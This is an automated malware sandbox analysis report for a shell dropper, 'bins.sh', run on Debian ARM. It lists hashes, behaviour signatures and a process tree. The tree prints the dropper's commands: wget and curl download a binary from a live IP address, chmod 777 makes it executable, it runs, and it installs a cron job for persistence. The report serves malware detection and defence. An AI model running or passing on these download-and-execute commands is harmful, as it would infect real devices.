Analysis
-
max time kernel
149s -
max time network
105s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25-11-2024 17:05
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
ff11827cacbdfc494c394c5d8e7272db
-
SHA1
9acddf73007240f35b04f7fe4732d47cd0b04137
-
SHA256
10e3e3e76552e191e9c880e374448c94e4d9ea8b76337345ffed3305d3b6722e
-
SHA512
a045f1446bdb8160644c1e258d5a17327dc5d81b05bda3fddbe70b00007d6b63363d4b98f10a9c1fbcdf87befe5a73a543a4e0f7728feae5ad0e053384968958
-
SSDEEP
192:JBVtKqN2M/XoDM9VR9/9d9k9I9NGjOHBVtKq8sXU9VR9/9d9k9I9Ton:t2MfoDM9X9/9d9k9I9NG6m2U9X9/9d9y
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 754 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr 755 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr -
Renames itself 1 IoCs
pid Process 756 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.fQai3w crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/146/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/572/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/filesystems crontab File opened for reading /proc/12/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/22/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/772/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/filesystems crontab File opened for reading /proc/135/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/267/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/300/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/643/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/782/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/784/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/15/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/24/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/25/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/20/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/105/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/136/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/264/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/283/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/self/auxv curl File opened for reading /proc/16/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/18/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/778/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/786/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/792/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/304/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/590/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/767/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/107/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/314/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/765/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/774/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/776/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/6/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/13/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/23/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/649/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/2/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/8/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/640/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/138/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/752/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/4/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/17/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/43/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/7/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/42/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/14/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/19/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/28/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/642/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/764/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/9/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/10/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/11/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/154/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/166/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/27/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/29/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/41/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/309/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr File opened for reading /proc/585/cmdline VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr wget File opened for modification /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr curl File opened for modification /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:643
-
/bin/rm/bin/rm bins.sh2⤵PID:645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr2⤵
- Writes file to tmp directory
PID:647
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr2⤵
- Writes file to tmp directory
PID:753
-
-
/bin/chmodchmod 777 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr./VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:755 -
/bin/shsh -c "crontab -l"3⤵PID:757
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:758
-
-
-
/bin/shsh -c "crontab -"3⤵PID:759
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:760
-
-
-
-
/bin/rmrm VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr2⤵PID:762
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR2⤵PID:765
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD5a8cdc9a79470432ff818c1f0cb667f99
SHA123cd257383dd969652ba19f24da2c9dd776adb98
SHA256c7ae0dd4be7775c6bbfbdd64d1fefdb2a8440ea7ef863d7d7eddd9ce627b607c
SHA51234c30829afd60c3593dae14e9f623afdab62bddc7c29b61a396d24e9d9c52819bbf4ac1cd7691977678c81eb1f76735f74155a97e181e0bc2d1533a62c94265d